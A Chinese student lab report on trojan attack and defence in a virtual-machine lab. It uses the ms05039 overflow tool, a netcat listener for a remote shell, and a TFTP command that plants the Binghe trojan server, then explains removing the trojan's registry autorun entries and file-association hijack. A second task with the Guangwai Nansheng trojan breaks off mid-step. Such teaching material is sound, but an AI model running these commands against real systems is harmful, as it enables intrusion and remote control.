网络安全实验报告 (5).doc

《网络安全》实验报告 实验序号：5　　　　　　　　　　实验项目名称：木马攻击与防范实验 学号 姓名 专业、班 实验地点 指导教师 实验时间 一、实验目的及要求 理解和掌握木马传播和运行的机制，掌握检查和删除木马的技巧，学会防御木马的相关知识，加深对木马的安全防范意识。 二、实验设备（环境）及要求 Windows 2000 server，虚拟机 三、实验内容与步骤 实验任务一：“冰河”木马 本实验需要把真实主机作为攻击机，虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机，然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。 步骤1：入侵准备工作 1）下载和安装木马软件前，关闭杀毒软件的自动防护功能，避免程序会被当作病毒而强行终止。 2）运行G_CLIENT.EXE. 3）选择菜单“设置”-“配置服务程序”. 4）设置访问口令为“1234567”，其它为默认值，点击 “确定” 5）将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻防\tftp32。 6）运行tftpd32.exe。保持此程序一直开启，用于等待攻击成功后传输木马服务程序。 步骤2：进行攻击，将木马放置在被攻击端 1)对靶机P3进行攻击，首先运行 nc -vv -l -p 99 图1 运行nc 接着再开一个dos窗口，运行 ms05039 3 99 1 图2 运行ms 2)攻击成功后，在运行nc -vv -l -p 99 的dos窗口中出现如图3提示，若攻不成功请参照“缓冲区溢出攻击与防范实验”，再次进行攻击。 图3 攻击成功示意 3）在此窗口中运行 tftp -i get g_server.exe 图4 上载木马程序并运行 图5 文件传送 步骤3：运行木马客户程序控制远程主机 打开程序端程序，单击快捷工具栏中的“添加主机”按扭 图6 添加主机 2）“文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号，可以浏览目标主机内容。 图7 成功下载文件后界面 2）“命令控制台”使用。单击“命令控制台”的标签，弹出命令控制台界面 步骤4：删除“冰河”木马 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 如图8。在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe，这就是“冰河”木马在注册表中加入的键值，将它删除。 打开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices，如图9。在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe，这也是“冰河”在注册表中加入的键值，将它删除。上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序，一般病毒程序，木马程序，后门程序等都放在这些子键目录下，所以要经常检查这些目录下的程序。 图8 注册表编辑 图9注册表编辑 然后再进入C:\WINNT\System32目录，找到“冰河”的两个可执行文件Kernel32.exe和Sysexplr.exe文件，将它们删除。 图10 删除木马程序 修改文件关联也是木马常用的手段，“冰河”将txt文件的缺省打开方式由notepad.exe改为木马的启动程序，除此之外，html，exe，zip，com等都是木马的目标。所以，最后还需要恢复注册表中的txt文件关联功能，只要将注册表中的 HKEY_CLASSES_ROOT\txtfile\shell\open\command 下的默认值，改为 C:\Windows\notpad.exe %1，即可，如图19。 这样，再次重启计算机我们就完全删除了“冰河”木马。 图11 修改注册表值 实验任务二：“广外男生”木马 本实验将真实机作为攻击机，虚拟机作为靶机。真实机利用“广外男生”木马对虚拟机进行攻击，最终完全取得虚拟机的控制权。最后学习木马的查杀。 1）“广外男生”的连接 运行gwboy.exe，打开“广外男生”的主程序。 图12 网络设置 6）生成代理文件，在“目标文件”中填入所生成服务器端程序的存放位置，如C:\攻防\Tftpd32\hacktest.exe，这个文件就是需要植入远程主机的木马文件。单击“完成”即可完成服务器端程序的设置，这时就生成了一个文件名为hacktest.exe的可执行文件，并将该文件拷贝到虚拟机桌面上。（此时可利用上述的方法拷贝）,传输成功： 图13 将该文件拷贝到虚拟机桌面上 （7）进行客户端与服务器连接。在虚拟机上执行木马程序hacktest.exe，等待一段时间后